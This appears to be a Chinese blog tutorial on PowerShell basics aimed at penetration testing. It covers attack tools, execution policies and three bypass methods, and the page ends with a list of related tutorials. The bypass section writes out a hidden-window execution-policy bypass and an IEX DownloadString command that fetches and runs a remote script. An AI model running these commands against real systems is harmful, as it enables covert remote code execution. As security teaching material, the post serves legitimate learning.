PowerShell基础

最新推荐文章于 2024-12-30 22:08:04 发布
最新推荐文章于 2024-12-30 22:08:04 发布
阅读量535 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: PowerShell攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/bring_coco/article/details/112709108

PowerShell攻击工具有以下几种:
1.PowerSploit
2.NiShang
3.Empire
4.PowerCat
PowerShell简介:
攻击者在一台计算机上运行代码,他们就会下载PowerShell脚本文件(.ps1)到磁盘中执行,甚至无须写到磁盘中执行,它可以直接在内存中运行,也可以把PowerShell看作命令行提示符cmd.exe的扩充,PowerShell需要.NET环境的支持
PowerShell优点:
1.windows7以上的操作系统默认安装
2.PowerShell脚本可以运行在内存中,不需要写入磁盘
3.可以从另一个系统中下载PowerShell脚本并执行
4.目前很多工具都是基于PowerShell开发的
5.很多安全软件并不能检测到PowerShell的活动
6.cmd.exe通常会被阻止运行,但是PowerShell不会
7.可以用来管理活动目录
查看PowerShell版本
命令:Get-Host
在这里插入图片描述
PowerShell基本概念:
1.PS1
一个PowerShell脚本其实就是一个简单的文本文件,这个文件包含了一系列PowerShell命令,每个命令显示为独立的一行,对于被视为PowerShell脚本的文本文件,它的文件名需要加上.PS1的扩展名
2.执行策略
为防止恶意脚本的执行,PowerShell有一个执行策略,默认情况下,这个执行策略被设为受限。
在PowerShell脚本无法执行时,可以使用下面的cmdlet命令确定当前的执行策略。
1.Get-ExecutionPolicy
2.Restricted:脚本不能运行(默认设置)
3.RemoteSigned:本地创建的脚本可以执行,但从网上下载的脚本不能运行(拥有数字证书签名的除外)
4.AllSigned:仅当脚本由受信任的发布者签名时才能运行
5.Unrestricted:允许所有的script运行
也可以使用如下cmdlet命令设置PowerShell的执行策略:
Set-ExecutionPolicy
3.运行脚本
运行一个PowerShell脚本,必须键入完整的路径和文件名,例如,你要运行一个名为a.ps1脚本,可以键入C:\Scripts\a.ps1。最大的例外是,如果PowerShell脚本文件刚好位于你的系统目录中,那么在命令提示符后直接键入文件名即可运行,如.\a.ps1的前面加入“.\”,这和在Linux下执行shell脚本的方法一样。
4.管道
管道的作用是将一个命令的输出作为另一个命令的输入,两个命令之间用管道符号(|)连接
举一个例子来看下管道是如何工作的,假设停止所有目前运行中的,以“p”字符开头命名的程序,命令如下所示。
Get-process p* | stop-process
PowerShell基本知识:
新建目录:New-Item whitecellclub-ItemType Directory
新建文件:New-Item light.txt-ItemType File
删除目录:Remove-Item whitecellclub
显示文件内容:Get-Content test.txt
设置文本内容:Set-Content.txt-Value”hell,world!”
追加内容:Add-Content light.txt-Value”i love you”
清除内容:Clear-Content test.txt
PowerShell脚本程序运行:
条件:1.管理员权限
2.将Restricted策略改成Unrestricted
绕过策略执行脚本的方法:
1.绕过本地权限执行
命令:PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
要求:创建一个test.ps1脚本文件并运行
不绕过情况下演示:
在这里插入图片描述
绕过情况下演示:
在这里插入图片描述
这里特别注意路径,为了方便之后的演示我将此目录下移入一个powershell.exe,因此再次演示:
在这里插入图片描述
同样成功

2.本地隐藏绕过权限执行脚本
命令:PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -Nonlnteractive -NoProfile -File xxx.ps1
要求:创建一个test1.ps1脚本文件并运行
绕过情况下演示:
在这里插入图片描述
3.用IEX下载远程PSI脚本绕过权限执行
命令:PowerShell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-Obje
ctNet.WebClient).DownloadString(“xxx.ps1”);[Parameters]

以上命令的参数说明:
ExecutionPolicy Bypass : 绕过执行安全策略,这个参数非常重要,在默认情况下,PowerShell的安全策略规定了PowerShell不允许运行命令和文件。通过设置这个参数,可以绕过任意一个安全规则。在渗透测试中,基本每一次运行PowerShell脚本时都要使用这个参数。
WindowStyle Hidden : 隐藏窗口
NoLogo : 启动不显示版权标志的PowerShell
NonInteractive (-Nonl) : 非交互模式,PowerShell不为用户提供交互的提示
NoProfile (-Nop): PowerShell控制台不加载当前用户的配置文件
Noexit : 执行后不退出Shell。这在使用键盘记录等脚本时非常重要。
PowerShell脚本在默认情况下无法直接运行,这时就可以使用上述三种方法绕过安全策略,运行PowerShell脚本。

powershell基础整理
刘同学的博客
10-09 500
0. 写在前面 powershell 是一个基础命令行语言,同时又具有编程风格,包括可以写函数,循环,分支,数组,等等;但是其语言又不同于C++,需要对变量进行定义,也不需要申请和释放内存,在编写的时候要注意理解什么是管道,什么是正则表达式,及一些基本是知识 1. 正则表达式 正则表达式就是用来筛选或者替换字符串的 正则表达式的理解请见:如何理解正则表达式及实例 正则表达式的符号含义:正则表达式的...
powershell 开发入门_PowerShell 入门基础教程
weixin_39655085的博客
01-14 380
Windows PowerShell 是专为系统管理员设计的新 Windows 命令行外壳程序。该外壳程序包括交互式提示和脚本环境,两者既可以独立使用也可以组合使用。现在win2008,win7都集成了PowerShell,系统不带PowerShell可以自行到官方下载安装即可。解读:1、什么是交互式提示?答:交互式提示就像打开一个cmd窗口,在里面执行一个ping命令一样,它会动态的输入结果。也...
PowerShell学习基础篇(使用帮助)
weixin_49668551的博客
07-12 9282
PowerShell不仅仅是一门脚本语言,其实是一种运行命令行工具的命令行Shell。虽然PowerShell可以通过脚本实现很复杂的功能,但脚本仅是使用PowerShell的一种方式。PowerShellWindows管理员提供自动化管理的工具,微软的多个产品组都采用了PowerShell,第三方生态系统扩展也是基于PowerShell,并且全球的社区专家与爱好者也都帮助PowerShell变得越来越好。
PowerShell基础命令篇
weixin_49668551的博客
08-11 5255
PowerShell拥有能够访问整个.Net Framework底层的能力(虽然在非Windows操作系统中,只是整个Framework的子集),我们也看到PowerShell“脚本”实际上与通过Visual Studio编写的C#语言使用模式也十分类似。注册表以类似文件系统的结构呈现,其中注册表的键等同于文件系统中的文件夹,对应的键值类似于文件系统中的文件,等等。以这种方式产生的命令,总会是命令的完整形式。完整的命令名称,完整的参数名称,所有的参数名称都显式输入(即不会出现位置参数)。
 PowerShell基础知识
Littleliuing的博客
06-26 724
PowerShell基础知识 1、powershell概念 powershell是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。 powershell可以大量简化人工操作,例如:安装某些应用前需要检查环境变量,安装完成后需要设置环境变量,检查和优化你的 注册表,这样的人工操作可以全部交给powershell来完成,并且powers...
PowerShell基础教程.doc
11-27
通过学习PowerShell基础教程,用户能够掌握如何利用其强大的对象模型和Cmdlet来自动化日常管理任务,提高工作效率。无论你是系统管理员还是开发者,PowerShell都是提升Windows环境管理能力不可或缺的工具。
精通PowerShell基础与应用
最新发布
04-15
此外,书中详细解释了PowerShell的流水线作业,包括基础和高级流水线操作,如内容分析、对象过滤、排序、分组、计算以及中间步骤的处理。最后,作者介绍了PowerShell的导航模型,包括如何通过注册表进行导航、提供者...
19.Powershell基础入门及常见用法(一)1
08-03
Powershell基础入门及常见用法】 Powershell是一种强大的命令行接口和脚本语言,主要用于管理和自动化Microsoft操作系统及应用程序。在网络安全领域,Powershell因其灵活性和深度集成而备受青睐,是Web安全专家...
20.Powershell基础入门及常见用法(二)1
08-04
Powershell基础入门及常见用法(二)1】这篇教程主要涵盖了Powershell的高级语法和常用操作,尤其对于网络安全领域的应用进行了讲解。以下是文章中的关键知识点: 1. **Powershell操作符**: - 包括比较操作符...
PowerShell基础知识
m0_57836225的博客
08-18 441
例如 `Get-Process | Sort-Object CPU -Descending` ,先获取进程信息,然后按照 CPU 使用率降序排列。- 可以使用 `Get-Help <命令>` 来获取特定命令的帮助信息,例如 `Get-Help Get-Process`。- 常见的数据类型包括字符串 `String` 、整数 `Int` 、浮点数 `Float` 等。,例如 `Get-Process` ,`Get` 是动词,`Process` 是名词。- 定义变量使用 `$` 符号,例如。
PowerShell入门教程
forwardss的博客
02-15 7852
PowerShell基础语句 1、进入Powershell环境 开始–运行–powershell 开始–运行–cmd–powershell 不同系统内置的powershell系统版本是不一样的 查看版本:$psversiontable 2、powershell功能特别强大 使用方便 命令命名方式简单:动词+名词 get-service 获取系统服务 get-help get-service...
PowerShell 快速入门
Dablelv 的博客专栏。
01-29 7462
PowerShell 是一种跨平台的任务自动化解决方案,由命令行 shell、脚本语言和配置管理框架组成。PowerShell 是微软发布的一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。PowerShell 于2016年8月18日开源并提供跨平台支持,可在 Windows、Linux 和 macOS 上运行。
PowerShell 基础知识
qq_49120918的博客
12-22 2561
PowerShell 是微软开发的一种命令行外壳程序和脚本语言,主要用于系统管理和自动化任务。它基于.NET Framework 构建,提供了丰富的命令行工具(称为 cmdlet),能够与 Windows 操作系统的各种组件进行深度交互,包括文件系统、注册表、网络服务、活动目录等诸多方面。
powershell 开发入门_Powershell快速入门(二) Shell编程
weixin_39638647的博客
01-14 548
这一部分着重于介绍Powershell的程序知识,让我们能够编写功能强大的Powershell脚本,执行比较复杂的任务。变量变量使用$变量名创建和引用。举个例子,Get-Location命令用于获取当前工作目录位置,它的别名是pwd。那么我们可以使用下面的命令来创建一个变量,存储当前目录位置。C:\Users\asddf> $current=pwd然后我们访问$current,就可以获取实际...
PowerShell入门
学习 记录 总结 分享
12-24 981
PowerShel特点 Windows PowerShell 入门主要面向之前没有 Windows PowerShell 背景知识的 IT 专业人员、程序员和高级用户。虽然具备脚本和 WMI 方面的背景知识会有所帮助,但是理解本文档并不假定或要求您具备此方面知识。 (1)、powershell功能更加强大可以说分分钟钟秒杀linux的bash,更别说饱受诟病的 cmd; (2)、powershell 背后依靠的是一套完整的 .NET 编程体系,其脚本更容易编写且稳健性大大提升。反过来看 cmd,那些完全由各
渗透学习笔记(十)PowerShell基础
u012853375的博客
12-30 803
上一章我们学习了shell编程,这一章学习powershell的内容。powershell主要是应用在windows上,但是也兼容Linux的命令,比如说ls等命令也是可以用的,对于shell和powershell这两部分内容,我们一定要多加熟悉练习,具体学习可以参考https://learn.microsoft.com/zh-cn/powershell/scripting/overview?view=powershell-7.4 这个官方文档地址。
PowerShell基础教程
1. **PowerShell基础知识**:包括如何启动PowerShell,理解PowerShell的命令行界面(Console)和PowerShell ISE(集成脚本环境),以及PowerShell的工作原理。 2. **PowerShell语法**:讲解PowerShell的命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值